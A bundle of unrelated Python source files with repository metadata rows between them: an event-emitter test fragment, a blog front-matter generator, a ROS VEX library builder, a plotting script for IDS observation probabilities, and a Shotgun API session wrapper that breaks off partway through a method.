self.emitter.on('once', cb, True)
self.emitter.emit('*')
self.emitter.emit('on*')
assert called[0]
def test_remove_listeners(self):
self.emitter.on('foo', lambda x: x)
self.emitter.on('bar', lambda x: x)
self.emitter.remove('bar')
self.emitter.remove('*')
assert self.emitter.listeners('foo') == []
assert self.emitter.listeners('bar') == []
def test_emit_unknown_events(self):
self.emitter.emit('quux')
self.emitter.remove('wut')
def test_provide_listeners(self):
def cb(): pass
self.emitter.on('quux', cb)
assert self.emitter.listeners('*') == [cb]
| 25.017241
| 52
| 0.565817
|
2e226a6a79da98634da562ec1d907f9d750a268b
| 1,955
|
py
|
Python
|
blog_info.py
|
Admiraldesvl/blog_info
|
a9336f5cad8b095c449a72802185548ee3a4f40e
|
[
"MIT"
] | null | null | null |
blog_info.py
|
Admiraldesvl/blog_info
|
a9336f5cad8b095c449a72802185548ee3a4f40e
|
[
"MIT"
] | null | null | null |
blog_info.py
|
Admiraldesvl/blog_info
|
a9336f5cad8b095c449a72802185548ee3a4f40e
|
[
"MIT"
] | null | null | null |
from datetime import date
import json
from shutil import copy
print("请输入文件名:")
fName = input()
File = open(fName,'w')
jsonFile = open("blog_info.json","r") # 在 blog_info.json里添加默认配置
data = json.load(jsonFile)
File.write('---\n')
# 评论开关
print("是否开启评论?(Y/N)")
m=input()
if(m=="Y"):
File.write("comment: true\n")
else:
File.write("comment: false\n")
#Mathjax开关
print("是否显示数学公式?(Y/N)")
m=input()
if(m=="Y"):
File.write("mathjax: true\n")
else:
File.write("mathjax: false\n")
#文章标题
print("请输入文章的标题:")
m = input()
File.write("title: " + m + "\n")
#文章摘要
print("请输入文章的摘要:")
m = input()
File.write("summary: "+m+"\n")
#日期
today = date.today()
d1 = today.strftime("%y-%m-%d\n")
File.write("date: " + d1)
#作者
File.write("author: "+data['author'][0]+'\n')
#标签
print("请输入序号选择标签, 如果要添加新标签请输入-1")
size = len(data['tags'])
File.write("tags: [\n\t")
for i in range(0,size):
print(str(i)+'. '+data['tags'][i])
while (1): # TODO: 一个更好的循环办法
m=int(input())
if(m>=0 and m<size):
File.write("\""+data['tags'][m]+"\"")
if(m==-1):
print("请输入新标签的名称") # TODO: 将新标签写入文件
m = input()
File.write("\""+m+"\"")
print("是否继续输入标签?(Y/N)")
m = input()
if(m!='Y'):
break
File.write(",")
File.write("\n]\n")
#分类
print("请输入序号选择分类, 如果要添加新分类请输入-1")
size = len(data['categories'])
File.write("categories: [\n\t")
for i in range(0,size):
print(str(i)+'. '+data['categories'][i])
while (1):
m=int(input())
if(m>=0 and m<size):
File.write("\""+data['categories'][m]+"\"")
if(m==-1):
print("请输入新分类的名称") # TODO: 将新分类写入文件
m = input()
File.write("\""+m+"\"")
print("是否继续输入分类?(Y/N)")
m = input()
if(m!='Y'):
break
File.write(",")
File.write("\n]\n")
File.write("---\n")
#写入正文
print("请输入需要插入的文件名")
m = input()
mdFile = open(m,'r')
mdText = mdFile.read()
File.write(mdText)
File.close()
copy(fName,data['path'][0])
jsonFile.close()
mdFile.close()
| 21.966292
| 63
| 0.568286
|
7cb055b373325fd9191bf7a36a232c8e96f3dfc0
| 3,802
|
py
|
Python
|
rosserial/rosserial_vex_v5/src/rosserial_vex_v5/make_libraries.py
|
JVR01/3DPrinted_Robot_ArmRepo
|
0f0b5aa7ddb9279f11aba6ad7c2a38c2d8926714
|
[
"MIT"
] | 1
|
2020-11-20T03:10:18.000Z
|
2020-11-20T03:10:18.000Z
|
rosserial/rosserial_vex_v5/src/rosserial_vex_v5/make_libraries.py
|
JVR01/3DPrinted_Robot_ArmRepo
|
0f0b5aa7ddb9279f11aba6ad7c2a38c2d8926714
|
[
"MIT"
] | 30
|
2020-11-27T23:12:12.000Z
|
2021-04-25T15:37:42.000Z
|
rosserial/rosserial_vex_v5/src/rosserial_vex_v5/make_libraries.py
|
JVR01/3DPrinted_Robot_ArmRepo
|
0f0b5aa7ddb9279f11aba6ad7c2a38c2d8926714
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#####################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
THIS_PACKAGE = "rosserial_vex_v5"
__usage__ = """
make_libraries.py generates the VEX Robot Brain rosserial library files. It requires the location of the include directory of a PROS kernel.
rosrun rosserial_vex_v5 make_libraries.py <pros_include_dir>
"""
import rospkg
import rosserial_client
from rosserial_client.make_library import *
# for copying files
import shutil
import os.path
ROS_TO_EMBEDDED_TYPES = {
'bool' : ('bool', 1, PrimitiveDataType, []),
'byte' : ('int8_t', 1, PrimitiveDataType, []),
'int8' : ('int8_t', 1, PrimitiveDataType, []),
'char' : ('uint8_t', 1, PrimitiveDataType, []),
'uint8' : ('uint8_t', 1, PrimitiveDataType, []),
'int16' : ('int16_t', 2, PrimitiveDataType, []),
'uint16' : ('uint16_t', 2, PrimitiveDataType, []),
'int32' : ('int32_t', 4, PrimitiveDataType, []),
'uint32' : ('uint32_t', 4, PrimitiveDataType, []),
'int64' : ('int64_t', 8, PrimitiveDataType, []),
'uint64' : ('uint64_t', 8, PrimitiveDataType, []),
'float32' : ('float', 4, PrimitiveDataType, []),
'float64' : ('float', 4, AVR_Float64DataType, []),
'time' : ('ros::Time', 8, TimeDataType, ['ros/time']),
'duration': ('ros::Duration', 8, TimeDataType, ['ros/duration']),
'string' : ('char*', 0, StringDataType, []),
'Header' : ('std_msgs::Header', 0, MessageDataType, ['std_msgs/Header'])
}
# need correct inputs
if (len(sys.argv) < 2):
print(__usage__)
exit()
# get output path
output_path = os.path.join(sys.argv[1], "ros_lib")
print("\nExporting to %s" % output_path)
rospack = rospkg.RosPack()
# copy ros_lib stuff in
shutil.rmtree(output_path, ignore_errors=True)
shutil.copytree(os.path.join(rospack.get_path(THIS_PACKAGE), "src", "ros_lib"), output_path)
rosserial_client_copy_files(rospack, output_path)
# generate messages
rosserial_generate(rospack, output_path, ROS_TO_EMBEDDED_TYPES)
| 42.244444
| 140
| 0.665439
|
979d569a9e48138a47b57f500ad2cdee19c670fb
| 2,213
|
py
|
Python
|
open_spiel/python/optimal_stopping_tests/test_traces.py
|
jstymne/repo
|
88b2cec2509edb54e60cef2faf83a74e81cf66de
|
[
"Apache-2.0"
] | null | null | null |
open_spiel/python/optimal_stopping_tests/test_traces.py
|
jstymne/repo
|
88b2cec2509edb54e60cef2faf83a74e81cf66de
|
[
"Apache-2.0"
] | null | null | null |
open_spiel/python/optimal_stopping_tests/test_traces.py
|
jstymne/repo
|
88b2cec2509edb54e60cef2faf83a74e81cf66de
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
#with open(f'traces/O_1.npy', 'rb') as f:
# O_1 = np.load(f, allow_pickle=True)
#with open(f'traces/O_2.npy', 'rb') as f:
# O_2 = np.load(f, allow_pickle=True)
with open(f'O_3.npy', 'rb') as f:
O_3 = np.load(f, allow_pickle=True)
#with open(f'traces/Z_1.npy', 'rb') as f:
# Z_1 = np.load(f, allow_pickle=True)
#with open(f'traces/Z_2.npy', 'rb') as f:
# Z_2 = np.load(f, allow_pickle=True)
with open(f'Z_3.npy', 'rb') as f:
Z_3 = np.load(f, allow_pickle=True)
#with open(f'new_Z3.npy', 'rb') as f:
# Z_3 = np.load(f, allow_pickle=True)
#print(O_1.shape)
#print(O_2.shape)
#print(O_3.shape)
#print(Z_1.shape)
#print(Z_2.shape)
#print(Z_3.shape)
#print(Z_1[:,:,0])
#print(Z_1[0,:,:] == Z_1[1,:,:] )
plt.figure()
#print(Z_1[:,:,0])
#obs = O_1
#Z_3 = Z_3[0,0:2,:]
obs_dist = Z_3[0,:]
obs_dist_intrusion = Z_3[1,:]
print(obs_dist_intrusion)
#np.save("Z_3.npy",Z_3,allow_pickle=True)
#print("sum" + str(sum(Z_1[0,0,:])))
plt.figure()
# set width of bar
#barWidth = 0.25
fig = plt.subplots(figsize =(12, 8))
"""
# Set position of bar on X axis
br = np.arange(len(obs))
br1 = [x for x in br]
br2 = [x + barWidth for x in br]
"""
# Make the plot
#plt.bar(br1, obs_dist, width = barWidth,
# edgecolor ='grey', label = "Observation probability in state 0 = no intrusion")
#plt.bar(br2, obs_dist_intrusion, width = barWidth,
# edgecolor ='grey', label = "Observation probability in state 1 = intrusion")
#print(obs_dist[:-1])
#print(obs_dist_intrusion[:-1])
plt.plot(obs_dist[:-1], label = "Observation probability in state 0 = no intrusion")
plt.plot(obs_dist_intrusion[:-1], label = "Observation probability in state 1 = intrusion")
# Adding Xticks
plt.xlabel("# of severe IDS alters", fontweight ='bold', fontsize = 16)
plt.ylabel("Observation probability", fontweight ='bold', fontsize = 16)
#plt.xticks([r + barWidth/2 for r in range(len(obs))],
# obs)
ax = plt.gca()
plt.legend(fontsize = 16, bbox_to_anchor=(0.67, 1.15), bbox_transform=ax.transAxes)
#plt.legend()
plt.savefig('obs_dist_plot_traces')
| 29.905405
| 91
| 0.637596
|
eb00e411e90a36168c60a2f2b07c2ba28d4cdd1e
| 36,146
|
py
|
Python
|
sgsession/session.py
|
VFXetc/sgsession
|
6ae016e376fda26ac8c2fbb48d96b878bd446da2
|
[
"BSD-3-Clause"
] | 9
|
2017-04-05T12:38:53.000Z
|
2021-06-25T15:41:07.000Z
|
sgsession/session.py
|
vfxetc/sgsession
|
6ae016e376fda26ac8c2fbb48d96b878bd446da2
|
[
"BSD-3-Clause"
] | null | null | null |
sgsession/session.py
|
vfxetc/sgsession
|
6ae016e376fda26ac8c2fbb48d96b878bd446da2
|
[
"BSD-3-Clause"
] | 3
|
2017-07-04T22:59:15.000Z
|
2018-05-19T22:47:26.000Z
|
"""The Session is a wrapper around a Shotgun instance, proxying requests to
the server and applying additional logic on top of it. The Session instance is
designed to be used for a single task and then discarded, since it makes the
assumption that entity relationships do not change.
While not fully documented below, this object will proxy all attributes to the
underlying Shotgun instance, so you can treat this as you would a Shotgun
instance.
"""
from __future__ import with_statement, absolute_import
import errno
import functools
import itertools
import json
import logging
import os
import re
import threading
import urlparse
import warnings
from sgschema import Schema
from dirmap import DirMap
from .entity import Entity
from .pool import ShotgunPool
from .utils import expand_braces, parse_isotime, shotgun_api3_connect, cached_property
log = logging.getLogger(__name__)
class EntityNotFoundWarning(UserWarning):
pass
class EntityNotFoundError(ValueError):
pass
def _asyncable(func):
"""Wrap a function, so that async=True will run it in a thread."""
@functools.wraps(func)
def _wrapped(self, *args, **kwargs):
if kwargs.pop('async', False):
return self._submit_concurrent(func, self, *args, **kwargs)
else:
return func(self, *args, **kwargs)
return _wrapped
def _assert_ownership(func):
"""Wrap a function that takes a list of entities, and make sure that we own them."""
@functools.wraps(func)
def _wrapped(self, entities, *args, **kwargs):
entities = list(entities)
for e in entities:
if isinstance(e, Entity):
if e.session is not self:
raise ValueError('Entity not from this session', e, self)
else:
raise TypeError('Non-Entity passed as entity', e)
return func(self, entities, *args, **kwargs)
return _wrapped
_recursion_sentinel = object()
class Session(object):
"""Shotgun wrapper.
:param shotgun: A Shotgun instance to wrap, or the name to be passed to
``shotgun_api3_registry.connect()`` in order to construct one.
If passed a name, the remaining args and kwargs will also be passed to the
api registry connector.
If passed a descendant of ``shotgun_api3.Shotgun`` (or one is constructed
via the registry), it will be wrapped in a :class:`~sgsession.pool.ShotgunPool` so that
it becomes thread-safe. Any other objects (e.g. mock servers) are used
unmodified.
If passed nothing, ``shotgun_api3_registry.connect`` will be called
the first time :attr:`shotgun` is accessed (which will happen on many
operations). To stop this behaviour, pass ``False``.
"""
#: Mapping of entity types to the field where their "parent" lives.
parent_fields = {
'Asset': 'project',
'Project': None,
'Sequence': 'project',
'Shot': 'sg_sequence',
'Task': 'entity',
'PublishEvent': 'sg_link',
'Version': 'entity',
# Lofty Sky custom entities.
# Please complain loudly if they affects your studio, because I have
# a plan to do this better.
'CustomEntity06': 'project', # $Book
'CustomEntity04': 'sg_book', # $BookIssue
'CustomEntity21': 'sg_issue', # $BookPage
}
#: Fields to always fetch for every entity.
important_fields_for_all = ['updated_at']
#: Fields to always fetch: maps entity type to a list of fields.
important_fields = {
'Asset': ['code', 'sg_asset_type'],
'HumanUser': ['firstname', 'lastname', 'email', 'login'],
'Project': ['name'],
'PublishEvent': ['code', 'sg_type', 'sg_version'],
'Sequence': ['code'],
'Shot': ['code'],
'Step': ['code', 'short_name', 'entity_type'],
'Task': ['step', 'content'],
'Version': ['code', 'sg_task'],
# Lofty Sky custom entities.
'CustomEntity06': ['code'], # $Book
'CustomEntity04': ['code'], # $BookIssue
'CustomEntity21': ['code'], # $BookPage
}
#: Links to always fetch: maps entity type to a mapping of field names to
#: a list of their potential entity types.
important_links = {
'Asset': {
'project': ['Project'],
},
'Sequence': {
'project': ['Project'],
},
'Shot': {
'project': ['Project'],
'sg_sequence': ['Sequence'],
},
'Task': {
'project': ['Project'],
'entity': ['Asset', 'Shot'],
'step': ['Step'],
},
'PublishEvent': {
'project': ['Project'],
'sg_link': ['Task'],
},
}
def __init__(self, shotgun=None, schema=None, dir_map=None, **kwargs):
# Lookup strings in the script registry.
if isinstance(shotgun, basestring):
shotgun = shotgun_api3_connect(shotgun, **kwargs)
# Wrap basic shotgun instances in our threader.
self._shotgun = ShotgunPool.wrap(shotgun)
self._shotgun_kwargs = None if shotgun else kwargs
self._schema = schema
self._dir_map = dir_map
self._cache = {}
self._thread_pool = None
@classmethod
def from_entity(cls, entity, *args, **kwargs):
if isinstance(entity, Entity) and entity.session:
return entity.session
else:
return cls(*args, **kwargs)
@property
def shotgun(self):
# Automatically generate Shotgun when we need one.
# We use False to track that there should be nothing set here.
if self._shotgun is None:
self._shotgun = ShotgunPool.wrap(shotgun_api3_connect(
**self._shotgun_kwargs
)) or False
return self._shotgun
@property
def schema(self):
# Automaticaly load schema when we need one.
# We use False to track that there should be nothing set here.
if self._schema is None:
# Wait on caching a schema here until there is a Shotgun.
shotgun = self.shotgun
if not shotgun:
return
try:
self._schema = Schema.from_cache(shotgun)
except ValueError:
self._schema = False
return self._schema or None
@cached_property
def dir_map(self):
return DirMap(self._dir_map or os.environ.get('SGSESSION_DIR_MAP'))
def __getattr__(self, name):
return getattr(self.shotgun, name)
def __reduce__(self):
# We assume that the shotgun and sgcache will automatically regenerate.
# Generally, the user should be very careful when pickling sessions.
shotgun = False if self._shotgun is False else None
schema = False if self._schema is False else None
return self.__class__, (shotgun, schema)
def merge(self, data, over=None, created_at=None, _depth=0, _memo=None):
"""Import data containing raw entities into the session.
This will effectively return a copy of any nested structure of lists,
tuples, and dicts, while converting any dicts which look like entities
into an :class:`.Entity`. The returned structure is a copy of the
original.
:param dict data: The raw fields to convert into an :class:`~sgsession.entity.Entity`.
:param bool over: Control for merge behaviour with existing data.
``True`` results in the new data taking precedence, and ``False``
the old data. The default of ``None`` will automatically decide
based on the ``updated_at`` field.
:return: The :class:`~sgsession.entity.Entity`. This will not be a new instance if the
entity was already in the session, but it will have all the newly
merged data in it.
"""
# Track down where we are getting string created_at from.
if created_at and isinstance(created_at, basestring):
# This can be a huge message...
log.error('string created_at (%r) given to Session.merge at depth %d; data to merge: %r' % (
created_at, _depth, data,
))
created_at = parse_isotime(created_at)
# Since we are dealing with recursive structures, we need to memoize
# the outputs by all of the inputs as we create them.
if _memo is None:
_memo = {}
id_ = id(data)
if id_ in _memo:
return _memo[id_]
_memo[id_] = _recursion_sentinel
obj = self._merge(data, over, created_at, _depth, _memo)
# If something fails at setting up a recursive object before returning,
# then we want to fail very hard.
if obj is _recursion_sentinel:
raise RuntimeError('un-memoized recursion')
_memo[id_] = obj
return obj
def _merge(self, data, over, created_at, depth, memo):
# No need to worry about resolving schema here, since Entity.__setitem__
# will ultimately do it.
# Pass through entities if they are owned by us.
if isinstance(data, Entity) and data.session is self:
return data
# Contents of lists and tuples should get merged.
if isinstance(data, list):
# Lists can be cyclic; memoize them.
memo[id(data)] = new = type(data)()
new.extend(self.merge(x, over, created_at, depth + 1, memo) for x in data)
return new
if isinstance(data, tuple):
return type(data)(self.merge(x, over, created_at, depth + 1, memo) for x in data)
if isinstance(data, basestring):
return self.dir_map(data)
if not isinstance(data, dict):
return data
# Non-entity dicts have all their values merged.
if not ('type' in data and 'id' in data):
memo[id(data)] = new = type(data)() # Setup recursion block.
new.update((k, self.merge(v, over, created_at)) for k, v in data.iteritems())
return new
# If it already exists, then merge this into the old one.
new = Entity(data['type'], data['id'], self)
key = new.cache_key
entity = self._cache.setdefault(new.cache_key, new)
memo[id(data)] = entity # Setup recursion block.
entity._update(data, over, created_at, depth + 1, memo)
return entity
def parse_user_input(self, spec, entity_types=None, fetch_project_from_page=False):
"""Parse user input into an entity.
:param str spec: The string of input from the user.
:param tuple entity_types: Acceptable entity types. Effective against
paths.
:param bool fetch_project_from_page: Allow pulling projects from the
more abstract pages.
:return: :class:`.Entity` or ``None``.
Acceptable forms of input are:
- Type-ID tuples, e.g. ``Task:123``, or ``Task_123``; accepts arbitrary
URL-like fields, e.g. ``Task:123?code=Example``.
- JSON, e.g. ``{"type": "Task", "id", 123}``
- Bare IDs, e.g. ``123``; only if ``entity_types`` is provided.
- Shotgun URLs including the entity, e.g. ``https://example.shotgunstudio.com/detail/Task/123`` or
``https://example.shotgunstudio.com/page/999#Task_123_Example``
- Shotgun pages without an entity, e.g. ``https://example.shotgunstudio.com/page/999``,
which describes ``Task 123``; only when ``fetch_project_from_page``.
Example::
>>> sg.parse_user_input('Task:123')
<Entity Task:123 at 0x110863618>
"""
spec = spec.strip()
# JSON.
if spec.startswith('{') and spec.endswith('}'):
raw = json.loads(spec)
if 'type' not in raw or 'id' not in raw:
raise ValueError('incomplete JSON entity', spec)
if not isinstance(raw['type'], basestring) or not isinstance(raw['id'], int):
raise ValueError('malformed JSON entity', spec)
return self.merge(raw)
# Accept integer IDs if we know we want a specific type.
if spec.isdigit():
if isinstance(entity_types, basestring):
entity_types = [entity_types]
if entity_types and len(entity_types) == 1:
return self.merge({'type': entity_types[0], 'id': int(spec)})
else:
raise ValueError('int-only spec without single entity_types', spec, entity_types)
# Shotgun detail URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/detail/([A-Za-z]+\d*)/(\d+)', spec)
if m:
return self.merge({'type': m.group(1), 'id': int(m.group(2))})
# Shotgun project overview URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/page/\d+#([A-Z][A-Za-z]+\d*)_(\d+)_', spec)
if m:
return self.merge({'type': m.group(1), 'id': int(m.group(2))})
# Shotgun page URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/page/(\d+)$', spec)
if m:
if not fetch_project_from_page:
raise ValueError('page URL without fetch_project_from_page', spec)
page = self.get('Page', int(m.group(1)), ['project'])
if not page:
raise ValueError('Page entity not found for page URL', spec)
if page.get('project'):
return self.merge(page['project'])
raise ValueError('page URL has no project', spec)
# Direct entities. E.g. `shot:12345?code=whatever`
m = re.match(r'^([A-Za-z]{3,}\d*)[:_ -](\d+)(?:_|$|\?(\S*))', spec)
if m:
type_, id_, query = m.groups()
raw = {
'type': type_[0].upper() + type_[1:],
'id': int(id_),
}
if query:
for k, v in urlparse.parse_qsl(query, keep_blank_values=True):
raw.setdefault(k, v)
return self.merge(raw)
raise ValueError('could not parse entity spec', spec)
def _submit_concurrent(self, func, *args, **kwargs):
if not self._thread_pool:
from concurrent.futures import ThreadPoolExecutor
self._thread_pool = ThreadPoolExecutor(8)
return self._thread_pool.submit(func, *args, **kwargs)
@_asyncable
def create(self, type, data=None, return_fields=None, **kwargs):
"""Create an entity of the given type and data.
:return: The new :class:`~sgsession.entity.Entity`.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-create>`_
"""
if data is not None and kwargs:
# This isn't quite ideal, but it doesn't let must confusing get through.
raise TypeError('provide only one of data or **kwargs')
data = self._minimize_entities(data if data is not None else kwargs)
if self.schema:
type = self.schema.resolve_one_entity(type)
data = self.schema.resolve_structure(data, type)
return_fields = self.schema.resolve_field(type, return_fields) if return_fields else []
return_fields = self._add_default_fields(type, return_fields)
return self.merge(self.shotgun.create(type, data, return_fields))
@_asyncable
def update(self, *args, **kwargs):
"""Update the given entity with the given fields.
.. todo:: Add this to the Entity.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-update>`_
"""
# Grab the "type" or 1st argument.
if not (args or kwargs):
raise TypeError('no arguments')
type_ = kwargs.pop('type', None)
if type_ is None:
if not args:
raise TypeError('must provide "type" kwarg or positional type argument')
type_ = args[0]
args = args[1:]
# Figure out if we were given an Entity, or an entity type (string)
if isinstance(type_, Entity):
ids = [type_['id']]
type_ = type_['type']
do_batch = False
elif isinstance(type_, basestring):
ids = kwargs.pop('id', None) or args[0]
args = args[1:]
do_batch = not isinstance(ids, int)
ids = list(ids) if do_batch else [ids]
elif isinstance(type_, (list, type)):
do_batch = True
entities = list(type_)
if not entities:
raise ValueError('entity sequence is empty')
sentinel = object()
non_entity = next((e for e in entities if not isinstance(e, Entity)), sentinel)
if non_entity is not sentinel:
raise ValueError('entity sequence contains non-Entity', non_entity)
type_ = entities[0]['type']
mismatched = next((e for e in entities if e['type'] != type_), None)
if mismatched is not None:
raise ValueError('mismatched entity types', type_, mismatched['type'])
ids = [e['id'] for e in entities]
else:
raise TypeError('first argument must be an Entity, list of entities, or string (entity type)', entity_or_type)
data = {}
for arg in args:
data.update(arg)
data.update(kwargs)
if not data:
raise ValueError('no data provided')
data = self._minimize_entities(data)
if self.schema:
type_ = self.schema.resolve_one_entity(type_)
data = self.schema.resolve_structure(data, type_)
if do_batch:
return self.batch([{
'request_type': 'update',
'entity_type': type_,
'entity_id': id_,
'data': data,
} for id_ in ids])
else:
return self.merge(self.shotgun.update(type_, ids[0], data), over=True)
@_asyncable
def batch(self, requests):
"""Perform a series of requests in a transaction.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-batch>`_
"""
requests = self._minimize_entities(requests)
if self.schema:
requests = self.schema.resolve_structure(requests)
return [self.merge(x, over=True) if isinstance(x, dict) else x for x in self.shotgun.batch(requests)]
def _add_default_fields(self, type_, fields):
fields = set(fields or ['id'])
# Add important fields for this type.
fields.update(self.important_fields_for_all)
fields.update(self.important_fields.get(type_, []))
# Add parent.
parent_field = self.parent_fields.get(type_)
if parent_field:
fields.add(parent_field)
# Add implied owners of deep-fields.
implied = set()
for field in fields:
parts = field.split('.')
for i in xrange(2, len(parts) + 1, 2):
implied.add('.'.join(parts[:i]) + '.id')
fields.update(implied)
# Add important deep-fields for requested type.
for local_field, link_types in self.important_links.get(type_, {}).iteritems():
fields.add(local_field)
for link_type in link_types:
remote_fields = self.important_fields.get(link_type, [])
remote_links = self.important_links.get(link_type, {})
for remote_field in itertools.chain(self.important_fields_for_all, remote_fields, remote_links.iterkeys()):
fields.add('%s.%s.%s' % (local_field, link_type, remote_field))
return sorted(fields)
def _minimize_entities(self, data):
if isinstance(data, dict):
# Attachments need to not be minimized, since they are often
# merged in with their own metadata. If we special cased merging
# them, then this could be a bit smarter and send only what is
# nessesary.
if data.get('type') == 'Attachment':
return data
if 'type' in data and 'id' in data:
return dict(type=data['type'], id=data['id'])
return dict((k, self._minimize_entities(v)) for k, v in data.iteritems())
if isinstance(data, (list, tuple)):
return [self._minimize_entities(x) for x in data]
return data
@_asyncable
def find(self, type_, filters, fields=None, *args, **kwargs):
"""Find entities.
:return: :class:`list` of found :class:`~sgsession.entity.Entity`.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-find>`_
"""
merge = kwargs.pop('merge', True)
if self.schema:
type_ = self.schema.resolve_one_entity(type_)
if kwargs.pop('add_default_fields', True):
fields = self._add_default_fields(type_, fields)
# Expand braces in fields.
expanded_fields = set()
for field in fields:
expanded_fields.update(expand_braces(field))
fields = sorted(expanded_fields)
# Resolve names in fields.
if self.schema:
filters = self.schema.resolve_structure(filters)
fields = self.schema.resolve_field(type_, fields) if fields else []
filters = self._minimize_entities(filters)
# Resolve names in filters.
if self.schema and isinstance(filters, (list, tuple)):
for i, old_filter in enumerate(filters):
filter_ = [self.schema.resolve_one_field(type_, old_filter[0])]
filter_.extend(old_filter[1:])
filters[i] = filter_
result = self.shotgun.find(type_, filters, fields, *args, **kwargs)
return [self.merge(x, over=True) for x in result] if merge else result
@_asyncable
def find_one(self, entity_type, filters, fields=None, order=None,
filter_operator=None, retired_only=False, **kwargs):
"""Find one entity.
:return: :class:`~sgsession.entity.Entity` or ``None``.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-find_one>`_
"""
results = self.find(entity_type, filters, fields, order,
filter_operator, 1, retired_only, **kwargs)
if results:
return results[0]
return None
def find_iter(self, *args, **kwargs):
limit = kwargs.pop('limit', None) or None
per_page = kwargs.pop('per_page', limit or 500) # this is the default
async_count = kwargs.pop('async_count', 1)
kwargs['limit'] = per_page
kwargs['async'] = True
page = 1
futures = []
done = False
while not done:
# extract all complete results; we wait for the first one, but
# then take as many others as are already done
rows = futures.pop(0).result() if futures else None
while rows and futures and futures[0].done():
rows.extend(futures.pop(0).result())
# determine if we are done yet
if rows is not None:
# print 'got', len(rows)
# we hit the end of results
if not rows or len(rows) < per_page:
done = True
# we hit the total requested
if limit is not None:
limit -= len(rows)
if limit <= 0:
done = True
# queue up the next queries
while not done and len(futures) < async_count:
# print 'queing', page
kwargs['page'] = page
futures.append(self.find(*args, **kwargs))
page += 1
# yield results
if rows is not None:
for x in rows:
yield x
@_asyncable
def delete(self, entity, entity_id=None):
"""Delete one entity.
.. warning:: This session will **not** forget about the deleted entity,
and all links from other entities will remain intact.
`See the Shotgun docs for more. <https://github.com/shotgunsoftware/python-api/wiki/Reference%3A-Methods#wiki-delete>`_
"""
if not isinstance(entity, Entity):
if self.schema:
entity = self.schema.resolve_one_entity(entity)
if not entity_id:
raise ValueError('must provide entity_id')
entity = self.merge({'type': entity, 'id': entity_id})
res = self.shotgun.delete(entity['type'], entity['id'])
entity._exists = False
return res
@_asyncable
def get(self, type_, id_, fields=None, fetch=True):
"""Get one entity by type and ID.
:param str type_: The entity type to lookup.
:param int id_: The entity ID to lookup. Accepts ``list`` or ``tuple``
of IDs, and returns the same.
:param bool fetch: Request this entity from the server if not cached?
"""
# Handle multiple IDs.
if isinstance(id_, (list, tuple)):
return type(id_)(self.get(type_, x) for x in id_)
if self.schema:
type_ = self.schema.resolve_one_entity(type_)
try:
entity = self._cache[(type_, id_)]
except KeyError:
return self.find_one(type_, [('id', 'is', id_)], fields or [])
else:
if fetch and fields:
entity.fetch(fields)
return entity
def get_url(self, url):
"""Get one entity by it's URL on Shotgun.
:param str url: The url to parse.
"""
# Shotgun detail URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/detail/([A-Za-z]+)/(\d+)', url)
if m:
return self.get(m.group(1).title(), int(m.group(2)))
# Shotgun project overview URL.
m = re.match(r'^https?://\w+\.shotgunstudio\.com/page/\d+#([A-Z][A-Za-z]+)_(\d+)_', url)
if m:
return self.get(m.group(1).title(), int(m.group(2)))
raise ValueError('cannot parse url: %r' % url)
def _fetch(self, entities, fields, force=False):
types = list(set(x['type'] for x in entities))
if len(types) > 1:
raise ValueError('can only fetch one type at once')
type_ = types[0]
ids_ = set()
for e in entities:
if force or any(f not in e for f in fields):
ids_.add(e['id'])
if ids_:
res = self.find(
type_,
[['id', 'in'] + list(ids_)],
fields,
)
missing = ids_.difference(e['id'] for e in res)
# Update _exists on the entities.
for e in entities:
e._exists = e['id'] not in missing
if missing:
raise EntityNotFoundError('%s %s not found' % (type_, ', '.join(map(str, sorted(missing)))))
@_assert_ownership
@_asyncable
def filter_exists(self, entities, check=True, force=False):
"""Return the subset of given entities which exist (non-retired).
:param list entities: An iterable of entities to check.
:param bool check: Should the server be consulted if we don't already know?
:param bool force: Should we always check the server?
:returns set: The entities which exist, or aren't sure about.
This will handle multiple entity-types in multiple requests.
"""
if check:
by_type = {}
for x in entities:
by_type.setdefault(x['type'], set()).add(x)
for type_, sub_entities in by_type.iteritems():
if force or any(e._exists is None for e in sub_entities):
found = self.find(type_, [['id', 'in'] + list(e['id'] for e in sub_entities)])
